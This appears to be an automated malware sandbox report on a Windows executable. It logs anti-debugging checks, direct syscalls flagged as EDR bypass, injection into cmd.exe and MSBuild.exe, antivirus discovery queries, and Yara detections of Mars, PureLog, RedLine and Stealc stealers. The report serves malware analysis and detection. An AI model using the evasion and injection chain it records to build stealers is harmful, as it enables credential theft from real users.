Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05BE9CDA
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE9E6D SetUnhandledExceptionFilter,	0_2_05BE9E6D
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BF09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05BF09A2
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_05BEA125
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC7AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BC7AC62
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00EFC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00EFC1FD
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00F06678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F06678
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C892782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C892782
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C8990E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C8990E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	NtQuerySystemInformation: Direct from: 0xDF5BE4
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	NtSetInformationThread: Direct from: 0x6CD8617C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	NtSetInformationThread: Direct from: 0x6C7A617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A791000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B03008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A791000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 637008

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_6BCC4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6BCC4760

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_6C7A3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

2_2_6C7A3470

Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_05C004F8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_05C0045D
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_05C00412
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_05C007D3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_05C007D5
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_05BF774B
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_05C0019A
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_05C008FE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: EnumSystemLocalesW,	0_2_05BF7358
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_05C00AD2
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: GetLocaleInfoW,	0_2_05C00A05
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5c4.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_6BBC8390 NSS_GetVersion,

1_2_6BBC8390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
